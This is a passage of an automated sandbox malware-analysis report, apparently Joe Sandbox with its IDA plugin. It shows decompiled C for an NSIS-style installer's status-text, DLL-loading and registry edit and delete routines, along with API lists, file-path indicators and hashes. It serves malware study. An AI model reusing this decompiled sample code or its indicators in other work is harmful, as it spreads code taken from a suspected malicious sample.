					_push(0x200010);
					_push(0x40a438);
					E0040596D();
					goto L29;
				}
				goto L33;
			}
















                                                            0x00401759
                                                            0x00401760
                                                            0x00401769
                                                            0x0040176c
                                                            0x0040176f
                                                            0x00401774
                                                            0x0040177c
                                                            0x00401798
                                                            0x0040177e
                                                            0x0040177e
                                                            0x0040177f
                                                            0x0040177f
                                                            0x0040179e
                                                            0x004017a8
                                                            0x004017a8
                                                            0x004017ac
                                                            0x004017af
                                                            0x004017b4
                                                            0x004017b6
                                                            0x004017b8
                                                            0x004017bd
                                                            0x004017bd
                                                            0x004017c8
                                                            0x004017c8
                                                            0x004017d9
                                                            0x004017db
                                                            0x004017db
                                                            0x004017dc
                                                            0x004017dc
                                                            0x004017df
                                                            0x004017e2
                                                            0x004017e5
                                                            0x004017e5
                                                            0x004017ec
                                                            0x004017fb
                                                            0x00401800
                                                            0x00401803
                                                            0x00401806
                                                            0x00000000
                                                            0x00000000
                                                            0x00401808
                                                            0x0040180b
                                                            0x00401865
                                                            0x0040186a
                                                            0x004015b0
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402ac5
                                                            0x00402ac8
                                                            0x00402ac8
                                                            0x00000000
                                                            0x0040180d
                                                            0x00401813
                                                            0x0040181e
                                                            0x0040182b
                                                            0x00401836
                                                            0x0040184c
                                                            0x0040184c
                                                            0x0040184f
                                                            0x00000000
                                                            0x00401855
                                                            0x00401855
                                                            0x00401856
                                                            0x00401873
                                                            0x00402ace
                                                            0x00402ace
                                                            0x00402ace
                                                            0x00401858
                                                            0x00401858
                                                            0x00401859
                                                            0x00401492
                                                            0x0040238f
                                                            0x0040238f
                                                            0x0040238f
                                                            0x00401856
                                                            0x0040184f
                                                            0x00402ad0
                                                            0x00402ad4
                                                            0x00402ad4
                                                            0x00401883
                                                            0x00401888
                                                            0x00401896
                                                            0x0040189b
                                                            0x004018a1
                                                            0x004018a5
                                                            0x004018a7
                                                            0x004018af
                                                            0x004018bb
                                                            0x004018a9
                                                            0x004018a9
                                                            0x004018ad
                                                            0x00000000
                                                            0x00000000
                                                            0x004018ad
                                                            0x004018c4
                                                            0x004018ca
                                                            0x004018cc
                                                            0x00000000
                                                            0x004018d2
                                                            0x004018d2
                                                            0x004018d5
                                                            0x004018ed
                                                            0x004018d7
                                                            0x004018da
                                                            0x004018e3
                                                            0x004018e3
                                                            0x004018f2
                                                            0x004018f7
                                                            0x0040238a
                                                            0x00000000
                                                            0x0040238a
                                                            0x00000000

                                                            APIs
                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,00000031), ref: 00401798
                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,00000031), ref: 004017C2
                                                              • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403556,0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: 8@$C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Call
                                                            • API String ID: 1941528284-3186164364
                                                            • Opcode ID: 03874d555682c28494de98f198ea20d949bb4d609246e22306f580c173a267ef
                                                            • Instruction ID: 3e968e9bdc471329156ed959ca9c7b0cca39a402a35bfbb3b78bbd1fa7da6ddf
                                                            • Opcode Fuzzy Hash: 03874d555682c28494de98f198ea20d949bb4d609246e22306f580c173a267ef
                                                            • Instruction Fuzzy Hash: F341D471900215BBCB207BB5CD45DAF7679EF45369B20823FF422B20E2D77C8A518A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405378 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 926 405378-40538d 927 405443-405447 926->927 928 405393-4053a5 926->928 929 4053b0-4053bc lstrlenA 928->929 930 4053a7-4053ab call 4062ea 928->930 931 4053d9-4053dd 929->931 932 4053be-4053ce lstrlenA 929->932 930->929 935 4053ec-4053f0 931->935 936 4053df-4053e6 SetWindowTextA 931->936 932->927 934 4053d0-4053d4 lstrcatA 932->934 934->931 937 4053f2-405434 SendMessageA * 3 935->937 938 405436-405438 935->938 936->935 937->938 938->927 939 40543a-40543d 938->939 939->927
                                                            C-Code - Quality: 100%
                                                            			E00405378(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x44e404;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4524d4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062EA(0, _t39, 0x438070, 0x438070, _a4);
					}
					_t26 = lstrlenA(0x438070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x44e3e8, 0x438070); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x438070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x438070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x4000) {
							_t26 = lstrcatA(0x438070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                            0x0040537e
                                                            0x0040538a
                                                            0x0040538d
                                                            0x00405393
                                                            0x0040539f
                                                            0x004053a2
                                                            0x004053a5
                                                            0x004053ab
                                                            0x004053ab
                                                            0x004053b1
                                                            0x004053b9
                                                            0x004053bc
                                                            0x004053d9
                                                            0x004053dd
                                                            0x004053e6
                                                            0x004053e6
                                                            0x004053f0
                                                            0x004053f9
                                                            0x00405405
                                                            0x0040540c
                                                            0x00405410
                                                            0x00405413
                                                            0x00405426
                                                            0x00405434
                                                            0x00405434
                                                            0x00405438
                                                            0x0040543a
                                                            0x0040543d
                                                            0x00000000
                                                            0x0040543d
                                                            0x004053be
                                                            0x004053c6
                                                            0x004053ce
                                                            0x004053d4
                                                            0x00000000
                                                            0x004053d4
                                                            0x004053ce
                                                            0x004053bc
                                                            0x00405447

                                                            APIs
                                                            • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                            • lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                            • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C), ref: 004053D4
                                                            • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll), ref: 004053E6
                                                            • SendMessageA.USER32 ref: 0040540C
                                                            • SendMessageA.USER32 ref: 00405426
                                                            • SendMessageA.USER32 ref: 00405434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll
                                                            • API String ID: 2531174081-1886271809
                                                            • Opcode ID: 43b59e8548ca3e8478251fdd04fd0e5e98560b6af6290137ab004f16df5a9164
                                                            • Instruction ID: 37f28695abd5d6743d555213097846b75af7b366b005b624e269435409e9a681
                                                            • Opcode Fuzzy Hash: 43b59e8548ca3e8478251fdd04fd0e5e98560b6af6290137ab004f16df5a9164
                                                            • Instruction Fuzzy Hash: 78218C71D00208BBDB11AFA5DD84ADEBFB9EF05354F14807AF904B6291C7798E808F98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004065F5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 940 4065f5-406615 GetSystemDirectoryA 941 406617 940->941 942 406619-40661b 940->942 941->942 943 40662b-40662d 942->943 944 40661d-406625 942->944 945 40662e-406660 wsprintfA LoadLibraryExA 943->945 944->943 946 406627-406629 944->946 946->945
                                                            C-Code - Quality: 100%
                                                            			E004065F5(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                            0x0040660c
                                                            0x00406615
                                                            0x00406617
                                                            0x00406617
                                                            0x0040661b
                                                            0x0040662d
                                                            0x00406627
                                                            0x00406627
                                                            0x00406627
                                                            0x00406631
                                                            0x00406645
                                                            0x00406659
                                                            0x00406660

                                                            APIs
                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                            • wsprintfA.USER32 ref: 00406645
                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%s.dll$UXTHEME$\
                                                            • API String ID: 2200240437-4240819195
                                                            • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                            • Instruction ID: 9f789840e0b15416ae64874b5c60068ae2f650887ed5db1015d4ebb1f4ad26b2
                                                            • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                            • Instruction Fuzzy Hash: 12F0213051060A67DB14A764DD0DFFB3B5CEB08304F14047EA586F10C1DAB9D5358B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402D3B Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 947 402d3b-402d64 call 4060dd 949 402d69-402d6d 947->949 950 402d73-402d77 949->950 951 402e1e-402e22 949->951 952 402d79-402d9a RegEnumValueA 950->952 953 402d9c-402daf 950->953 952->953 954 402e03-402e11 RegCloseKey 952->954 955 402dd8-402ddf RegEnumKeyA 953->955 954->951 956 402db1-402db3 955->956 957 402de1-402df3 RegCloseKey call 406663 955->957 956->954 959 402db5-402dc9 call 402d3b 956->959 963 402e13-402e19 957->963 964 402df5-402e01 RegDeleteKeyA 957->964 959->957 965 402dcb-402dd7 959->965 963->951 964->951 965->955
                                                            C-Code - Quality: 48%
                                                            			E00402D3B(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060DD(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402D3B(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406663(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                            0x00402d46
                                                            0x00402d4f
                                                            0x00402d58
                                                            0x00402d64
                                                            0x00402d6d
                                                            0x00402d77
                                                            0x00402d9c
                                                            0x00402da2
                                                            0x00402da7
                                                            0x00402da8
                                                            0x00402dd8
                                                            0x00402db1
                                                            0x00402db3
                                                            0x00402e03
                                                            0x00402e06
                                                            0x00000000
                                                            0x00402e0c
                                                            0x00402dc2
                                                            0x00402dc7
                                                            0x00402dc9
                                                            0x00000000
                                                            0x00000000
                                                            0x00402dd1
                                                            0x00402dd6
                                                            0x00402dd7
                                                            0x00402dd7
                                                            0x00402de4
                                                            0x00402dec
                                                            0x00402df3
                                                            0x00000000
                                                            0x00402e1c
                                                            0x00000000
                                                            0x00402dfb
                                                            0x00402d87
                                                            0x00402d9a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402d9a
                                                            0x00402e22

                                                            APIs
                                                            • RegEnumValueA.ADVAPI32 ref: 00402D8F
                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DDB
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402DE4
                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402DFB
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402E06
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseEnum$DeleteValue
                                                            • String ID:
                                                            • API String ID: 1354259210-0
                                                            • Opcode ID: 0b70125d2885548f0ad194bbca3c62b33980be104f870c091c4e8a98a002eebf
                                                            • Instruction ID: d48e4a71bfa48a15fd7248f9ae3dc224302ba9e6f67c9eaa91d5645e55e2e307
                                                            • Opcode Fuzzy Hash: 0b70125d2885548f0ad194bbca3c62b33980be104f870c091c4e8a98a002eebf
                                                            • Instruction Fuzzy Hash: D9213771500108BADF129F90CE89EEB7B7DEF44344F10047AFA15B11A0D7B49EA4AAA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040247E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 966 40247e-4024af call 402c39 * 2 call 402cc9 973 402ac5-402ad4 966->973 974 4024b5-4024bf 966->974 976 4024c1-4024ce call 402c39 lstrlenA 974->976 977 4024cf-4024d2 974->977 976->977 979 4024d4-4024e8 call 402c17 977->979 980 4024e9-4024ec 977->980 979->980 984 4024fd-402511 RegSetValueExA 980->984 985 4024ee-4024f8 call 403143 980->985 988 402513 984->988 989 402516-4025f3 RegCloseKey 984->989 985->984 988->989 989->973
                                                            C-Code - Quality: 83%
                                                            			E0040247E(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t18;
				void* _t19;
				int _t22;
				long _t23;
				int _t28;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t35;
				void* _t37;
				void* _t40;

				_t31 = __edx;
				_t28 = __ebx;
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				_t32 = __eax;
				 *(_t37 - 0x38) =  *(_t37 - 0x14);
				 *(_t37 - 0x78) = E00402C39(2);
				_t18 = E00402C39(0x11);
				 *(_t37 - 4) = 1;
				_t19 = E00402CC9(_t40, _t32, _t18, 2); // executed
				 *(_t37 + 8) = _t19;
				if(_t19 != __ebx) {
					_t22 = 0;
					if(_t35 == 1) {
						E00402C39(0x23);
						_t22 = lstrlenA(0x40e438) + 1;
					}
					if(_t35 == 4) {
						 *0x40e438 = E00402C17(3);
						 *((intOrPtr*)(_t37 - 0x88)) = _t31;
						_t22 = _t35;
					}
					if(_t35 == 3) {
						_t22 = E00403143( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40e438, 0x6000);
					}
					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x78), _t28,  *(_t37 - 0x38), 0x40e438, _t22); // executed
					if(_t23 == 0) {
						 *(_t37 - 4) = _t28;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x4524a8 =  *0x4524a8 +  *(_t37 - 4);
				return 0;
			}













                                                            0x0040247e
                                                            0x0040247e
                                                            0x0040247e
                                                            0x00402481
                                                            0x00402488
                                                            0x00402492
                                                            0x00402495
                                                            0x0040249e
                                                            0x004024a5
                                                            0x004024ac
                                                            0x004024af
                                                            0x004024b5
                                                            0x004024bf
                                                            0x004024c3
                                                            0x004024ce
                                                            0x004024ce
                                                            0x004024d2
                                                            0x004024dc
                                                            0x004024e2
                                                            0x004024e8
                                                            0x004024e8
                                                            0x004024ec
                                                            0x004024f8
                                                            0x004024f8
                                                            0x00402509
                                                            0x00402511
                                                            0x00402513
                                                            0x00402513
                                                            0x00402516
                                                            0x004025ed
                                                            0x004025ed
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • lstrlenA.KERNEL32(0040E438,00000023,00000011,00000002), ref: 004024C9
                                                            • RegSetValueExA.KERNEL32(?,?,?,?,0040E438,00000000), ref: 00402509
                                                            • RegCloseKey.ADVAPI32(?), ref: 004025ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseValuelstrlen
                                                            • String ID: 8@
                                                            • API String ID: 2655323295-819625340
                                                            • Opcode ID: 65587d1442390afad9897b2e89eb803fe651756d21c2971c27c9d1827eb7d305
                                                            • Instruction ID: 5c472bfcd106fad06d1ca2f2b491726f83d19557c2f496224d1fecae1d857e91
                                                            • Opcode Fuzzy Hash: 65587d1442390afad9897b2e89eb803fe651756d21c2971c27c9d1827eb7d305
                                                            • Instruction Fuzzy Hash: C3115E71E04208BEEB10AFA5DE49AAEBA74AB44714F20443BF505B71C1D6B98D909B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004020A5 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
